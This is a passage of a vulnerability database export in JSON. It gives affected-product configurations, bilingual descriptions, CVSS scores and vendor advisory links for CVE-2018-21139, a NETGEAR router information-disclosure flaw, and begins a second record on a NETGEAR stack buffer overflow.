"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BAAD2F7-BF0A-412B-BC2E-A69DC9BCB52E",
"versionEndExcluding": "1.0.1.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52A6DEB2-3A33-4184-866D-9C8D9DD991C6",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8E20F6EF-0585-4432-8DCC-29C3B01616CE",
"versionEndExcluding": "1.2.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E8EB69B-6619-47B6-A073-D0B840D4EB0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E453D3AE-A218-4791-BB19-79C2CF6EC6F8",
"versionEndExcluding": "1.0.9.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90805FFE-E59D-43D2-BF1E-D55458CF05BF",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B484FA9-17B9-4829-9152-83691EE6A9BB",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "586740D8-2423-404C-B5E2-23B273945CCD",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "29B13F94-F151-4F00-95C3-D9FB22B3CC2B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EA8492-4A15-420E-B616-F93CC36EF255",
"versionEndExcluding": "1.0.0.124",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "536487B8-FF04-4526-BE91-44437256525C",
"versionEndExcluding": "1.0.3.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E0DFBF4-E393-44AE-AEF9-1B2059EE5AE8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "471E4F42-7114-4A7F-832D-2E9222BD25B4",
"versionEndExcluding": "1.0.2.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4FED192A-8427-4293-850F-42519DBE7521",
"versionEndExcluding": "1.4.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C5FC237-F74C-4771-B5D3-36CF245C0396",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A1DEFB47-32C4-4AF6-87AF-0C09E8D5CD81",
"versionEndExcluding": "1.4.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3000rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "663F925A-642C-4E4A-9D27-76B6EF6978F6",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3000rp:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E449BEE1-DFE7-413C-B15E-4E6EE6FB84CF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3000rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "663F925A-642C-4E4A-9D27-76B6EF6978F6",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3000rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "3DAD97C7-458D-4547-82A4-EC7F4CFB2A90",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38BC0F78-4571-45E6-9023-CD1AEA7DF8EF",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD376891-1FB6-48B7-A4B3-C3C2C6E92C39",
"versionEndExcluding": "1.0.2.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "832B6460-9984-4441-8E06-F784052FC8CC",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "EC5B6CB8-D439-42D5-ACAE-6246874EA5F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9FFDF78E-8CC6-47B8-B70D-352F778CBF2C",
"versionEndExcluding": "1.0.2.104",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "D99E146D-B278-4CA6-8156-7D9923015779",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94398B78-9F11-4AD2-A518-3A81CDD72E88",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "68F195E4-0A6D-400B-8F48-3EA07DC3A3ED",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "35548CE8-3F3B-456D-9E95-A8A2C2E2B247",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "C8218868-273B-46DB-B636-D3F9A3768069",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "37E56123-6404-4DC8-B2C5-CE89532EFB20",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C2189628-03E7-445A-9EF2-656A85539115",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BA48EB08-ABBC-4F42-8877-FF40E475E3A7",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9877579C-D214-4605-93AA-2B78914CF33C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E338A30-C349-41B4-B971-E6D6B0E9AFE4",
"versionEndExcluding": "1.2.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by disclosure of sensitive information. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.58, D6200 before 1.1.00.30, D6220 before 1.0.0.46, D6400 before 1.0.0.82, D7000 before 1.0.1.68, D7000v2 before 1.0.0.51, D7800 before 1.0.1.42, D8500 before 1.0.3.42, DC112A before 1.0.0.40, DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, JNR1010v2 before 1.1.0.54, JR6150 before 1.0.1.18, JWNR2010v5 before 1.1.0.54, PR2000 before 1.0.0.24, R6020 before 1.0.0.34, R6050 before 1.0.1.18, R6080 before 1.0.0.34, R6100 before 1.0.1.22, R6120 before 1.0.0.42, R6220 before 1.1.0.68, R6250 before 1.0.4.30, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.60, R6700 before 1.0.1.48, R6700v2 before 1.2.0.24, R6800 before 1.2.0.24, R6900 before 1.0.1.48, R6900P before 1.3.1.44, R6900v2 before 1.2.0.24, R7000 before 1.0.9.34, R7000P before 1.3.1.44, R7100LG before 1.0.0.48, R7300 before 1.0.0.68, R7500 before 1.0.0.124, R7500v2 before 1.0.3.38, R7900 before 1.0.2.16, R7900P before 1.4.1.24, R8000 before 1.0.4.18, R8000P before 1.4.1.24, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN3000RP before 1.0.0.68, WN3000RPv2 before 1.0.0.68, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR1000v4 before 1.1.0.54, WNR2020 before 1.1.0.54, WNR2050 before 1.1.0.54, and WNR3500Lv2 before 1.2.0.54."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una divulgaci\u00f3n de informaci\u00f3n confidencial. Esto afecta a D1500 versiones anteriores a 1.0.0.27, D500 versiones anteriores a 1.0.0.27, D6100 versiones anteriores a 1.0.0.58, D6200 versiones anteriores a 1.1.00.30, D6220 versiones anteriores a 1.0.0.46, D6400 versiones anteriores a 1.0.0.82, D7000 versiones anteriores a 1.0.1.68, D7000v2 versiones anteriores a 1.0.0.51, D7800 versiones anteriores a 1.0.1.42, D8500 versiones anteriores a 1.0.3.42, DC112A versiones anteriores a 1.0.0.40, DGN2200Bv4 versiones anteriores a 1.0.0.102, DGN2200v4 versiones anteriores a 1.0.0.102, JNR1010v2 versiones anteriores a 1.1.0.54, JR6150 versiones anteriores a 1.0.1.18, JWNR2010v5 versiones anteriores a 1.1.0.54, PR2000 versiones anteriores a 1.0.0.24, R6020 versiones anteriores a 1.0.0.34, R6050 versiones anteriores a 1.0.1.18, R6080 versiones anteriores a 1.0.0.34, R6100 versiones anteriores a 1.0.1.22, R6120 versiones anteriores a 1.0.0.42, R6220 versiones anteriores a 1.1.0.68, R6250 versiones anteriores a 1.0.4.30, R6300v2 versiones anteriores a 1.0. 4.32, R6400 versiones anteriores a 1.0.1.44, R6400v2 versiones anteriores a 1.0.2.60, R6700 versiones anteriores a 1.0.1.48, R6700v2 versiones anteriores a 1.2.0.24, R6800 versiones anteriores a 1.2.0.24, R6900 versiones anteriores a 1.0.1.48, R6900P versiones anteriores a 1.3.1.44, R6900v2 versiones anteriores a 1.2.0.24, R7000 versiones anteriores a 1.0.9.34, R7000P versiones anteriores a 1.3.1.44, R7100LG versiones anteriores a 1.0.0.48, R7300 versiones anteriores a 1.0.0.68, R7500 versiones anteriores a 1.0.0.124, R7500v2 versiones anteriores a 1.0.3.38, R7900 versiones anteriores a 1.0.2.16, R7900P versiones anteriores a 1.4.1.24, R80 00 versiones anteriores a 1.0.4.18, R8000P versiones anteriores a 1.4.1.24, R8300 versiones anteriores a 1.0.2.122, R8500 versiones anteriores a 1.0.2.122, WN3000RP versiones anteriores a 1.0.0.68, WN3000RPv2 versiones anteriores a 1.0.0.68, WNDR3400v3 versiones anteriores a 1.0.1.18, WNDR3700v4 versiones anteriores a 1.0.2.102, WNDR3700v5 1.1.0.54, WNDR4300v1 versiones anteriores a 1.0.2.104, WNDR4300v2 versiones anteriores a 1.0.0.56, WNDR4500v3 versiones anteriores a 1.0.0.56, WNR1000v4 versiones anteriores a 1.1.0.54, WNR2020 versiones anteriores a 1.1.0.54, WNR2050 versiones anteriores a 1.1.0.54 y WNR3500Lv2 versiones anteriores a 1.2.0.54."
}
],
"id": "CVE-2018-21139",
"lastModified": "2024-11-21T04:02:59.713",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T21:15:11.690",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060220/Security-Advisory-for-Sensitive-Information-Disclosure-on-Some-Routers-and-Smart-Cradles-PSV-2017-2198"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060220/Security-Advisory-for-Sensitive-Information-Disclosure-on-Some-Routers-and-Smart-Cradles-PSV-2017-2198"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-08-11 00:16
Modified
2024-11-21 06:17
Severity ?
6.8 (Medium) - CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BECFDEE-A795-43F1-9651-13096141B3BE",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C6F2403-48F3-436E-B625-326E7B58EFC8",
"versionEndExcluding": "1.0.0.76",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C487C01-3E4A-4DBB-9BFB-A143E6B90580",
"versionEndExcluding": "1.1.00.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD73CBDF-0B17-4B1A-8A06-9F3926D1D113",
"versionEndExcluding": "1.0.1.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCC9779E-41E5-445C-99B5-E58F52EF233E",
"versionEndExcluding": "1.0.1.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "B4F62287-CB55-4FB1-AA39-62018654BA39",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2263B13-89CF-475E-ABE0-062783D924F7",
"versionEndExcluding": "1.0.1.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EBCC111C-7F79-4F20-B007-279EAA197D4D",
"versionEndExcluding": "1.0.1.186",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8D9781C9-799A-4BDA-A027-987627A01633",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC9C60BB-2E7F-4D35-9348-8D8AEFAAD75F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:pr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "50E2E26A-200E-4D00-9657-034EACE3944F",
"versionEndExcluding": "1.0.0.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:pr2000:-:*:*:*:*:*:*:*",
